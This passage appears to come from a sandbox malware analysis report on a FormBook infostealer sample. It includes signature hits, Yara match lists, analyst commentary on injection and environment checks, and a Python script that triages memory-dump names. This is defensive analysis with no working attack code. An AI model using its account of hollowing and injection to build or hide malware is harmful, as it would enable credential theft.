Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 8_2_004030FB
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10004030 GetProcessHeap,HeapAlloc,GetUserNameW,lstrcmpW,GetProcessHeap,HeapFree, 8_2_10004030
The entry-point chain of eVJOpc.exe (0x4030FB) reads its own command line, resolves the temp and Windows directories, deletes and copies a file and has a code path into ExitWindowsEx before ExitProcess; that ExitWindowsEx call is what the "Contains functionality to shutdown / reboot the system" signature refers to. The second function lives in a module mapped at 0x10000000, i.e. a DLL loaded by the dropper rather than the dropper itself, and it retrieves the current user name with GetUserNameW and compares it to a string with lstrcmpW, the usual shape of an environment check on the logged-on user name.

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp Binary or memory string: \\192.168.2.1\all\procexp.exe
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp Binary or memory string: "c:\users\user\desktop\procexp.exe
All three strings come from explorer.exe's own read-write memory (process index 0xA, protection 0x04) and two of them are full paths into the analysis environment (a lab share and the user's desktop), which is what explorer.exe keeps as shell and run history. They are not the bare process names a hard-coded kill list would carry, so this signature should be read as low confidence for this sample; the injection into explorer.exe is evidenced by the Yara matches below, not by these strings.

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY
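The memory dump names in the two Yara match lists above (under "Stealing of Sensitive Information" and "Remote Access Functionality") encode where each FormBook hit was found. The following is an added example, not part of the sandbox report: it parses those names and reports, per process, the base addresses of executable regions that matched. It assumes the dump name layout process index.snapshot.dump id.base address.protection.type, decodes the protection field with the winnt.h PAGE_* constants and the type field with the MEM_* constants, and leaves values it cannot name (such as the type value 0x1) marked unknown rather than guessing. The input lines are the MEMORY entries copied from the list above, plus two UNPACKEDPE entries to show that those are skipped.

```python
"""Triage Joe Sandbox memory-dump names from a Yara match list.

Added example, not part of the sandbox report. The dump-name layout
(process index . snapshot . dump id . base address . protection . type)
is an assumption drawn from the names in the report; the numeric
constants below are the winnt.h values.
"""
import re
from collections import defaultdict

# winnt.h page-protection constants; the report prints the field in hex.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}
# Any of PAGE_EXECUTE (0x10) .. PAGE_EXECUTE_WRITECOPY (0x80) is executable.
EXECUTE_MASK = 0xF0
# winnt.h region-type constants; other values (e.g. 0x1 in this report) are
# the sandbox's own encoding, which is not documented on the page.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)
MATCH_RE = re.compile(r"File source:\s*(?P<src>\S+),\s*type:\s*(?P<kind>\w+)")


def parse_sdmp(name):
    """Decode one <...>.sdmp name into its fields (assumed layout, see above)."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a sandbox dump name: {name}")
    prot = int(m["prot"], 16)
    mtype = int(m["type"], 16)
    return {
        "pid_index": int(m["pid"], 16),
        "snapshot": int(m["snap"], 16),
        "dump_id": int(m["dump"]),
        "base": int(m["base"], 16),
        "protection": PAGE_PROTECT.get(prot, f"UNKNOWN(0x{prot:x})"),
        "executable": bool(prot & EXECUTE_MASK),
        "region_type": MEM_TYPE.get(mtype, f"UNKNOWN(0x{mtype:x})"),
    }


def memory_hits(report_lines):
    """Return the decoded MEMORY hits; .unpack entries are rebuilt PE files, not live regions."""
    hits = []
    for line in report_lines:
        m = MATCH_RE.search(line)
        if not m or m["kind"] != "MEMORY":
            continue
        hits.append(parse_sdmp(m["src"]))
    return hits


def executable_hits_by_process(report_lines):
    """Map process index -> sorted base addresses of executable regions that matched."""
    by_pid = defaultdict(set)
    for h in memory_hits(report_lines):
        if h["executable"]:
            by_pid[h["pid_index"]].add(h["base"])
    return {pid: sorted(bases) for pid, bases in by_pid.items()}


# Entries copied from the report's Yara match list (two UNPACKEDPE lines included).
REPORT_LINES = [
    "Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match File source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    for pid, bases in sorted(executable_hits_by_process(REPORT_LINES).items()):
        print(f"process index {pid:#x}: " + ", ".join(f"{b:#x}" for b in bases))
```

Run on the report's own entries, the output separates the stages the signatures describe: process index 8 (the dropper) holds the payload only in a PAGE_READWRITE buffer at 0xF040000 and does not appear among the executable hits; process index 9 (the hollowed eVJOpc.exe child) has the payload at its image base 0x400000 in snapshots 0, 1 and 2 as well as in private RWX regions at 0x590000 and 0x9E0000; and process index 0xA (explorer.exe) carries it at 0x79AA000 in a private RWX region, which is the injected copy. Executable, private, RWX regions whose contents match a malware family are the artefact to carve and dump first; the RW buffer in the dropper is the same payload before it was mapped.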
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007A00 RpcStringBindingComposeA,RpcBindingFromStringBindingA,RpcStringFreeA, 8_2_10007A00
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007A90 RpcBindingFree, 8_2_10007A90
The two functions cited are RPC client-side calls: RpcStringBindingComposeA builds a string binding, RpcBindingFromStringBindingA turns it into a client binding handle for talking to an existing RPC server, and RpcBindingFree releases it. Nothing here registers an interface or calls RpcServerListen, and no socket listen is involved, so these calls do not by themselves show a listening port; the heuristic fires on the RPC imports, and the remote-access capability of this sample rests on the FormBook identification above rather than on this signature.